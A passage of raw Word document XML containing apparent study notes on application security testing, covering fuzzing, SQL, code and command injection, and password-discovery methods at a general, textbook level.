          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> them to find</w:t>
      </w:r>
      <w:r w:rsidR="00E46563">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> problems other tests may miss like internal business logic problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4877F5C9" w14:textId="12FBF3DF" w:rsidR="001E4171" w:rsidRDefault="002F37B7" w:rsidP="002F37B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Can be done with automated tools or manual review (code understanding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0270DE55" w14:textId="35A7645E" w:rsidR="00CE7B5C" w:rsidRPr="00E9039E" w:rsidRDefault="00CE7B5C" w:rsidP="00CE7B5C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dynamic Code Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E5930B" w14:textId="4788492C" w:rsidR="00CE7B5C" w:rsidRDefault="0067342F" w:rsidP="00CE7B5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Relies on code execution w</w:t>
      </w:r>
      <w:r w:rsidR="0008192C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hile providing it with input to test the software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8A3E0" w14:textId="39DFFEE1" w:rsidR="00F51A48" w:rsidRDefault="00F51A48" w:rsidP="00F51A4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Can be automated or done manually, but automated is preferred as </w:t>
      </w:r>
      <w:r w:rsidR="007B432C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it can do large volume tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420AFA6" w14:textId="1F17E3DE" w:rsidR="007B432C" w:rsidRPr="00E9039E" w:rsidRDefault="007B432C" w:rsidP="007B432C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fuzzing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D7714" w14:textId="6F5DDF5B" w:rsidR="007B432C" w:rsidRDefault="007B432C" w:rsidP="007B432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Involves sending invalid or random data to an application to test its ability to handle unexpected data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DEB58" w14:textId="1450785B" w:rsidR="005B5D0A" w:rsidRDefault="004D2BFE" w:rsidP="004D2BF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 application is monitored to determine if it crashes, fails, or responds in an incorrect manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A9776" w14:textId="2B1D983B" w:rsidR="004D2BFE" w:rsidRDefault="00D32D10" w:rsidP="004D2BF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Typically,</w:t>
      </w:r>
      <w:r w:rsidR="004D2BFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>automated due to the large volume of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511F4CC9" w14:textId="10F0A20E" w:rsidR="00D32D10" w:rsidRDefault="00D32D10" w:rsidP="004D2BF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Useful</w:t>
      </w:r>
      <w:r w:rsidR="006A788E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for detecting input validation and logic issues as well as memory leaks and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B3FE1" w14:textId="5BDA37A8" w:rsidR="006A788E" w:rsidRDefault="006A788E" w:rsidP="006A788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Unfortunately, only identifies simple problems and does not account for complex logic or business process issues</w:t>
      </w:r>
      <w:r w:rsidR="00A527D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F14B6B5" w14:textId="72A63E31" w:rsidR="00A527D9" w:rsidRDefault="00A527D9" w:rsidP="00A527D9">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t>Injection Vulnerabilities:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C023EA1" w14:textId="77777777" w:rsidR="00007733" w:rsidRDefault="0091507F" w:rsidP="00A527D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One of the primary mechanisms that attackers use to break through a web application and gain access to the systems supporting that application</w:t>
      </w:r>
      <w:r w:rsidR="00FB2AE4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F04824" w14:textId="026AF33E" w:rsidR="00A527D9" w:rsidRDefault="00C205AB" w:rsidP="00A527D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These vulnerabilities </w:t>
      </w:r>
      <w:r w:rsidR="00007733">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A497D0" w14:textId="3B2D1EB6" w:rsidR="00D66F12" w:rsidRPr="00E9039E" w:rsidRDefault="00D66F12" w:rsidP="00A527D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQL Injection Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15531548" w14:textId="1D4F873D" w:rsidR="00D66F12" w:rsidRDefault="00D66F12" w:rsidP="00D66F1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Web applications often receive input from users and use it to compose a database query that provides results that are sent back to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2B4CA" w14:textId="4A80701D" w:rsidR="00CE58E3" w:rsidRDefault="00710876" w:rsidP="0071087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For example, if a shopping app has a search bar, the </w:t>
      </w:r>
      <w:r w:rsidR="003C4FE6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attacker could use the search bar to trick the app into sending a query for credit card numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30637AFB" w14:textId="7EA5D01A" w:rsidR="00561D86" w:rsidRPr="00E9039E" w:rsidRDefault="00561D86" w:rsidP="00561D86">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind Content-Based SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C355C90" w14:textId="61AC8BD0" w:rsidR="00561D86" w:rsidRDefault="009C5A16" w:rsidP="00561D8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 perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting</w:t>
      </w:r>
      <w:r w:rsidR="004C212B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to carry out the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA2C52" w14:textId="335829AE" w:rsidR="008E5270" w:rsidRDefault="008E5270" w:rsidP="008E5270">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This can </w:t>
      </w:r>
      <w:r w:rsidR="00B803F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">be done for example </w:t>
      </w:r>
      <w:r w:rsidR="00EF7B7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>by sending certain inputs into application inputs and observing how the application responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A51383" w14:textId="3118843F" w:rsidR="00EF7B7B" w:rsidRDefault="00EF7B7B" w:rsidP="00EF7B7B">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Certain re</w:t>
      </w:r>
      <w:r w:rsidR="008D41B4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">sponses </w:t>
      </w:r>
      <w:r w:rsidR="00501A43">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and even the lack of a response can show that </w:t>
      </w:r>
      <w:r w:rsidR="000D69D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a database supports the input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A42DC91" w14:textId="63D07AE0" w:rsidR="000D69D5" w:rsidRPr="00E9039E" w:rsidRDefault="004638BB" w:rsidP="000D69D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blind Timing-Based SQL Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F4ADF" w14:textId="122DDAC8" w:rsidR="004638BB" w:rsidRDefault="002F150B" w:rsidP="004638B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Pen testers</w:t>
      </w:r>
      <w:r w:rsidR="008210A7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> may use the amount of time required to process a query as a channel for retrieving information from a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BCAF75" w14:textId="48226FA2" w:rsidR="00833D01" w:rsidRDefault="008939CA" w:rsidP="00833D01">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SQL supports a command that delays </w:t>
      </w:r>
      <w:r w:rsidR="001E75D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the respond of sending data back to the user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5F5C8" w14:textId="5F43DF81" w:rsidR="00EB688E" w:rsidRDefault="00EB688E" w:rsidP="00833D01">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If used properly, this command can be used as confirmation </w:t>
      </w:r>
      <w:r w:rsidR="009419D6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">that the command is even supported, and </w:t>
      </w:r>
      <w:r w:rsidR="003C0E66">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>confirming if data is present in other fields as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A03E4" w14:textId="06CEA70E" w:rsidR="003C0E66" w:rsidRPr="00E9039E" w:rsidRDefault="003C0E66" w:rsidP="0032320A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Injection Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FDB081" w14:textId="55AC2CCA" w:rsidR="003C0E66" w:rsidRDefault="002E0D48" w:rsidP="0032320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Attacks that seek to insert attacker-written code into the legitimate code created by a web application</w:t>
      </w:r>
      <w:r w:rsidR="001E0F11">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> developer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43791B02" w14:textId="1E3C64B6" w:rsidR="00D46C50" w:rsidRDefault="00D46C50" w:rsidP="0032320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Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E410AED" w14:textId="60C8EA1B" w:rsidR="000525AF" w:rsidRDefault="000525AF" w:rsidP="0032320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SQL injections are a specific type of </w:t>
      </w:r>
      <w:r w:rsidR="00AE4E94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>code injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCD832B" w14:textId="2B0C7797" w:rsidR="00AE4E94" w:rsidRDefault="00763BF3" w:rsidP="0032320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Similar attacks may take place against other environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CE4AB8" w14:textId="41BBAD76" w:rsidR="00763BF3" w:rsidRDefault="006258CE" w:rsidP="0032320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Lightweight Directory Access Protocol (LDAP) queries are vulnerable to embedded commands </w:t>
      </w:r>
      <w:r w:rsidR="00F9455C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE235AB" w14:textId="358AED31" w:rsidR="00F9455C" w:rsidRDefault="00F9455C" w:rsidP="0032320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Extensible Markup Language (XML) </w:t>
      </w:r>
      <w:r w:rsidR="00C30F79">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">also have their own XML injection where code is embedded </w:t>
      </w:r>
      <w:r w:rsidR="0077444E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inside documents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21CF02" w14:textId="1FBBB7A6" w:rsidR="0077444E" w:rsidRDefault="0077444E" w:rsidP="0032320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Dynamic Linked Libraries (DLLs) </w:t>
      </w:r>
      <w:r w:rsidR="00DC3759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are also vulnerable to DLL injection attacks where command</w:t>
      </w:r>
      <w:r w:rsidR="00C12805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A2506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00C12805">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> loaded dynamically with </w:t>
      </w:r>
      <w:r w:rsidR="006A2506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29614394" w14:textId="56B74BFE" w:rsidR="00C12805" w:rsidRDefault="00C12805" w:rsidP="0032320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SQL</w:t>
      </w:r>
      <w:r w:rsidR="006A2506">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> has cross site scripting where HTML code is inserted by attackers into web pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B44104C" w14:textId="3E806A9B" w:rsidR="006A2506" w:rsidRPr="00E9039E" w:rsidRDefault="006A2506" w:rsidP="006A2506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Command Injection Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4857EBB1" w14:textId="03BB1C84" w:rsidR="006A2506" w:rsidRDefault="002A29E3" w:rsidP="006A250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Application code may reach back to the operating system to execute a command</w:t>
      </w:r>
      <w:r w:rsidR="0041278F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and attackers may be able to exploit this to directly exploit the OS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6DC7E5" w14:textId="6394C6AD" w:rsidR="0041278F" w:rsidRDefault="006E7B72" w:rsidP="006E7B7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This in</w:t>
      </w:r>
      <w:r w:rsidR="00390DCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cludes removing files and doing command line stuff.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0EB090" w14:textId="3D1E347E" w:rsidR="00390DCD" w:rsidRDefault="00390DCD" w:rsidP="00390DCD">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t>Exploiting Authentication Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D468136" w14:textId="091619EA" w:rsidR="00390DCD" w:rsidRPr="00E9039E" w:rsidRDefault="00DE44A1" w:rsidP="00390DCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Password Authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E305FD7" w14:textId="19FC5719" w:rsidR="00DE44A1" w:rsidRDefault="00F5398E" w:rsidP="00DE44A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Passwords are the most common form of authentication </w:t>
      </w:r>
      <w:r w:rsidR="00A50598">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">but can easily be defeated. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008D9428" w14:textId="11DAE4DC" w:rsidR="00A50598" w:rsidRDefault="00A50598" w:rsidP="00A5059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This is because they are </w:t>
      </w:r>
      <w:r w:rsidR="00FE189A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>knowledge-based</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FE189A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>authentication and if an attacker discovers a password, they can use it if they are not caught, and the password does not change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4E667" w14:textId="5D8A2622" w:rsidR="00FE189A" w:rsidRDefault="00785FF9" w:rsidP="00FE189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They can discover passwords by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FC3319" w14:textId="55460BAB" w:rsidR="00785FF9" w:rsidRDefault="00785FF9" w:rsidP="00785FF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Conducting social engineering attacks that trick the user into revealing a password, either directly or through false authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C96EF" w14:textId="0E305B8D" w:rsidR="00785FF9" w:rsidRDefault="00785FF9" w:rsidP="00785FF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Eavesdropping on </w:t>
      </w:r>
      <w:r w:rsidR="00B24519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unencrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F92A11" w14:textId="349C0360" w:rsidR="00785FF9" w:rsidRDefault="00785FF9" w:rsidP="00785FF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Obtaining a dump of passwords from previously compromised sites and assuming </w:t>
      </w:r>
      <w:r w:rsidR="00B24519">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that a significant proportion of users reuse their passwords from that site on other sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA7734" w14:textId="286BA1E2" w:rsidR="003F5C37" w:rsidRDefault="006D7624" w:rsidP="006D762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There is also brute-force and hashing</w:t>
      </w:r>
      <w:r w:rsidR="0041477C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3978ACD4" w14:textId="3336B548" w:rsidR="0041477C" w:rsidRDefault="0041477C" w:rsidP="006D762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Additionally, many </w:t>
      </w:r>
      <w:r w:rsidR="008B0CDB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">application and services have default usernames and passwords that must be changed by the user. </w:t>
      </w:r>
      <w:r w:rsidR="0020168F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attackers can leverage this on people who just didn’t change their password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D89019" w14:textId="1F12A4DE" w:rsidR="0020168F" w:rsidRPr="00E9039E" w:rsidRDefault="0020168F" w:rsidP="0020168F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
